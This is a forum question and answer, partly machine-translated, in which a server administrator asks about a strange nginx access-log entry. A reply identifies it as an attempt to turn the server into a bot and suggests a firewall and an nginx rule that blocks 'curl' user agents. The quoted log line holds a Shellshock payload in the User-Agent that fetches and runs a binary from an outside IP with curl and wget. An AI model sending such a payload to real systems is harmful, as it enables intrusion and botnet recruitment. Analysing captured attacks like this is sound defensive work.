Heute habe ich zufällig ein sehr seltsames Protokoll im access.log von nginx auf dem Firmenserver entdeckt:
61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"
Wenn es um seltsame Orte geht:
Mit http1.0
User-Agent ist ein Skript
Ich habe im Internet gesucht und keine Informationen über die Verwendung eines Benutzeragenten für den Angriff gefunden. Obwohl ich den Skriptcode erhalten konnte, indem ich der Adresse im Protokoll folgte, waren meine Fähigkeiten eingeschränkt und ich konnte das Angriffsziel nicht analysieren.
Entschuldigung, gibt es Experten, haben Sie relevante Informationen und Erfahrungen? Bitte teile es mit mir, vielen Dank! !
Hinzugefügt:
Unter welcher Nginx-Konfiguration wird der Inhalt im Benutzeragenten analysiert?
这个应该是
http1.0的user-agent漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS攻击,但是我不知道nginx会不会执行它这个脚本你可以看看你
access.log中http://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/a你可以看看这个代码。扫描器注入的。。。都会解析User-Agent的。
1、装应用防火墙
2、配置Nginx
`
if ($http_user_agent ~* 'curl') #配置被拒绝的 user_agent。
{
return 403;
}
`
一段
perl脚本,作用就是 伪装成Apache然后接受指令干一些事情。。。没错,就是抓肉鸡。